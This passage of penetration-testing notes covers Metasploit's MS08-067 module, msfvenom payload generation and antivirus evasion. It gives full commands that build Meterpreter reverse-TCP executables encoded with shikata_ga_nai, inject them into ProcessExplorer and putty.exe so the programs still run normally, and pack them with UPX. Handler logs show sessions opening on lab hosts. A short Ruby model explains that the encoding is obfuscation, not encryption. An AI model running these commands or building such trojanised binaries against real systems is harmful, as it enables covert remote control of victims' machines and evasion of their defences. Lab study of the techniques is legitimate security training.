  NX on some operating systems and service packs. The correct target must be
  used to prevent the Server Service (along with a dozen others in the same
  process) from crashing. Windows XP targets seem to handle multiple successful
  exploitation events, but 2003 targets will often crash or hang on subsequent
  attempts. This is just the first version of this module, full support for NX
  bypass on 2003, along with other platforms, is still in development.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250
  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos


msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.105
lhost => 192.168.0.105
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.105    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf6 exploit(windows/smb/ms08_067_netapi) > unset lhost
Unsetting lhost...
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


Setting lhost globally for all modules

msf6 exploit(windows/smb/ms08_067_netapi) > setg lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > unsetg lhost


Anti-virus evasion

msfvenom

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid, example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message

Windows x86 Meterpreter, encoded ten times with shikata_ga_nai and written as an .exe:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

Android Meterpreter as an APK (R is the legacy spelling of -f raw; the output is redirected into the file):

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=9999 R > test.apk

Evading anti-virus detection

Using MSF encoders

# msfvenom -l encoders

Framework Encoders [--encoder]
==============================

    ...
    x86/shikata_ga_nai       excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit    manual     Single Static Bit
    x86/unicode_mixed        manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper        manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic          normal     Dynamic key XOR Encoder

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
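Note what the encoder output further down actually shows: each iteration adds exactly 27 bytes (381, 408, 435, ...), which is the size of the shikata_ga_nai decoder stub wrapped around the previous result. -i 10 nests ten stubs; it does not make the bytes ten times harder to recognise, and the XOR key lives inside the stub, so this is obfuscation for bad-character avoidance and signature variation, not encryption. The Ruby block below is an added example, not Metasploit's encoder: it models the byte transform the encoder's name describes (32-bit XOR with additive feedback) and the key search that -b performs, on a constructed byte string that contains the page's bad characters. It emits no decoder stub.

```ruby
# Toy model of what x86/shikata_ga_nai does to the bytes: a 32-bit XOR whose
# key changes after every block by adding the just-decoded plaintext block
# ("additive feedback"). Added example code, not Metasploit's encoder; the
# polymorphic decoder stub the real encoder prepends is not modelled.

def xor_additive_encode(payload, key)
  data = payload.b
  data += "\x00".b * ((4 - data.bytesize % 4) % 4)   # pad to whole 32-bit blocks
  out = ''.b
  data.unpack('V*').each do |block|
    out << [block ^ key].pack('V')
    key = (key + block) & 0xFFFFFFFF                  # feedback uses the plaintext block
  end
  out
end

# Mirrors what the decoder stub does per block: xor [ptr], key ; add key, [ptr]
def xor_additive_decode(encoded, key)
  out = ''.b
  encoded.unpack('V*').each do |block|
    plain = block ^ key
    out << [plain].pack('V')
    key = (key + plain) & 0xFFFFFFFF
  end
  out
end

# What -b does: try keys until neither the key (which is embedded in the
# stub) nor the encoded bytes contain a forbidden byte. Returns [key, bytes]
# or nil if the budget runs out.
def find_clean_key(payload, badchars, rng: Random.new(1), tries: 100_000)
  tries.times do
    key = rng.rand(0..0xFFFFFFFF)
    next if [key].pack('V').bytes.any? { |b| badchars.include?(b) }
    enc = xor_additive_encode(payload, key)
    return [key, enc] if enc.bytes.none? { |b| badchars.include?(b) }
  end
  nil
end

# Constructed input: not shellcode, just bytes that contain every value in
# the page's -b '\x00\x0a\xff' list several times over.
SAMPLE_PAYLOAD = ("\xcc\x00\x0a\xff".b * 5) + "\x90".b
BAD_CHARS      = [0x00, 0x0a, 0xff].freeze

if __FILE__ == $PROGRAM_NAME
  key, enc = find_clean_key(SAMPLE_PAYLOAD, BAD_CHARS)
  puts format('key 0x%08x: %d -> %d bytes, bad bytes left: %d',
              key, SAMPLE_PAYLOAD.bytesize, enc.bytesize,
              enc.bytes.count { |b| BAD_CHARS.include?(b) })
end
```

Two properties fall out of the model: the same input under two keys gives two unrelated byte strings (the "polymorphic" part, as far as the body goes), and anyone holding the stub holds the key, so the body decodes trivially. That is why signatures target the stub, and why stacking iterations adds stubs rather than secrecy.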


Using a custom executable as a template

wget http://download.sysinternals.com/files/ProcessExplorer.zip   (a local mirror works too)

msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload1.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 2661376 bytes
Saved as: payload1.exe


Upload payload1.exe to the Windows host and run it.


# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:30805) at 2022-06-28 17:03:05 +0800
meterpreter > pwd
C:\Users\xiang\Desktop


Launching the payload stealthily

With -k the template keeps its normal behaviour (here putty.exe runs as usual) and the payload is injected as a new thread. Only one -x template can be used; the original command passed -x twice and only the last one, putty.exe, took effect.

msfvenom -a x86 --platform Windows -x putty.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload2.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 702464 bytes
Saved as: payload2.exe


Upload payload2.exe to the Windows host and run it.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:50055) at 2022-06-28 17:23:50 +0800
meterpreter >

Packing

upx

# upx
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                      -l    list compressed file
  -t     test compressed file                -V    display version number
  -h     give more help                   -L    display software license
Options:
  -q     be quiet                         -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress
Type 'upx --help' for more detailed help.
UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io